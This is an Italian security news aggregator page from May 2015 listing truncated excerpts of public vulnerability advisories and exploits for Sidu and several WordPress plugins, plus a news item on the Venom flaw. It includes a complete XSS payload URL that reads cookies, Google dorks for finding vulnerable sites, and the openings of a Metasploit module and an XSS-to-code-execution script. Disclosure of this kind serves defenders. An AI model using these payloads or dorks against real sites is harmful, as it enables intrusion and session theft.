Sidu 5.2 Admin XSS Vulnerability

15 maggio 2015 - Fonte: http://www.mondounix.com
Affected Vendor:
www.topnew.net/sidu/
 
Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org
 
Source:
http://hyp3rlinx.altervista.org/advisories/AS-SIDU0513.txt
 
Product:
Sidu version 5.2 is a web based database front-end administration tool.
 
Advisory Information:
=====================================================
Sidu 5.2 is vulnerable to cross site scripting attacks.
 
Exploit code:
==============
 
http://localhost/sidu52/sql.php?id=1&sql=%27%27%3Cscript%3Ealert%28%22XSS%20By%20hyp3rlinx%20\n05112015\n%22%2bdocument.cookie%29%3C/script%3E
 
Disclosure Timeline:
==================================
 
Vendor Notification  May 12, 2015
May 13, 2015: Public Disclosure
 
Severity...

Leggi il seguito »

WordPress RevSlider 3.0.95 File Upload / Execute

15 maggio 2015 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress RevSlider File Upload and Execute Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress ThemePunch
        Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The
        vulnerability allows for arbitrary file upload and remote code execution.
...

Leggi il seguito »

WordPress Ultimate Product Catalogue 3.1.2 SQL Injection

15 maggio 2015 - Fonte: http://www.mondounix.com
--------
ISSUE 1:
 
# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate
Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE...

Leggi il seguito »

WordPress Freshmail 1.5.8 SQL Injection

15 maggio 2015 - Fonte: http://www.mondounix.com
------------------------
ISSUE 1:
 
 
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage:
*http://freshmail.com/ <http://freshmail.com/> *
# Software Link:
*https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
<https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>*
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary
------------------
 
Freshmail plugin is an email...

Leggi il seguito »

Venom, un nuovo 0-day fa tremare i server

14 maggio 2015 - Fonte: http://www.chimerarevo.com

Le soluzioni di VPS (Server Virtuale Privato) ed hosting condiviso sono tra le più diffuse tra chi cerca un buon compromesso tra qualità e prezzo, ed entrambe hanno un punto che le accomuna: il server, quello reale, esegue più sistemi operativi in parallelo sullo stesso hardware grazie ad un sofisticato meccanismo regolato per la maggiore da un software definito “hypervisor”. Di norma tutti i sistemi operativi presenti sul server fisico, pur restando entità separate, ne condividono le risorse.

...

Leggi il seguito »

WordPress Ad Inserter 1.5.2 CSRF / XSS

9 maggio 2015 - Fonte: http://www.mondounix.com
================================================================
CSRF/Stored XSS Vulnerability in Ad Inserter Plugin 
================================================================
 
 
. contents:: Table Of Content
 
Overview
========
 
* Title :CSRF and Stored XSS Vulnerability in Ad Inserter Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/ad-inserter/
* Severity: HIGH
* Version Affected: Version  1.5.2  and mostly prior to it
* Version Tested : Version  1.5.2
* version patched:
 
Description 
===========
 
Vulnerable Parameter 
--------------------
* ad1_name
* Block 1
* Block Name
* adinserter name
* disable adinserter 
 
 
About...

Leggi il seguito »

WordPress Embed-Articles 7.0.3 CSRF / XSS

9 maggio 2015 - Fonte: http://www.mondounix.com
======================================================
CSRF/Stored XSS Vulnerability in embed articles Plugin
======================================================
 
 
. contents:: Table Of Content
 
Overview
========
 
* Title :CSRF and Stored XSS Vulnerability in embed-articles Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/embed-articles/
* Severity: HIGH
* Version Affected: Version 7.0.3 and mostly prior to it
* Version Tested : Version 7.0.3
* version patched:
 
Description 
===========
 
Vulnerable Parameter 
--------------------
 
* API Key
 
About Vulnerability
-------------------
This plugin is vulnerable to a combination of...

Leggi il seguito »

WordPress Akismet 3.1.1 Cross Site Scripting

9 maggio 2015 - Fonte: http://www.mondounix.com
# Exploit Title: Wordpress Akismet 3.1.1 Plugin - XSS Vulnerability
# Google Dork: inurl:/wp-content/plugins/akismet/akismet.php
# Date: 2014-12-29
# Exploit Author: Ehsan Ice
# Software Link: https://akismet.com/ ,
https://wordpress.org/plugins/akismet/developers/
# Download Link: https://downloads.wordpress.org/plugin/akismet.3.1.1.zip
# Version : 3.1.1
# Tested on: Kali , Windows
# CVE : N/A
 
 XSS Vulnerability
 http://site/wp-content/plugins/akismet/akismet.php
 http://site/wp-content/plugins/akismet/class.akismet-admin.php
 
  Userinput reaches sensitive sink when function add_comment_author_url()
is called.
 
428: print print (wp_update_comment($comment));  // class.akismet-admin.php
426: $comment['comment_author_url']...

Leggi il seguito »

WordPress 4.2.1 XSS / Code Execution

9 maggio 2015 - Fonte: http://www.mondounix.com
/*
Author: @Evex_1337
Title: Wordpress XSS to RCE
Description: This Exploit Uses XSS Vulnerabilities in Wordpress
Plugins/Themes/Core To End Up Executing Code After The Being Triggered With
Administrator Previliged User. ¯\_(ツ)_/¯
Reference: http://research.evex.pw/?vuln=14
Enjoy.
 
*/
//Installed Plugins Page
plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ?
'plugins.php' : 'wp-admin/plugins.php';
//Inject "XSS" Div
jQuery('body').append('<div id="xss" ></div>');
xss_div = jQuery('#xss');
xss_div.hide();
//Get Installed Plugins Page Source and Append it to "XSS" Div
jQuery.ajax({
  url: plugins,
  type: 'GET',
  async: false,
  cache: false,
  timeout:...

Leggi il seguito »

WordPress Ultimate Product Catalogue 3.1.2 XSS / CSRF / File Upload

9 maggio 2015 - Fonte: http://www.mondounix.com
# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate
Product Catalogue 3.1.2
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.5
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1....

Leggi il seguito »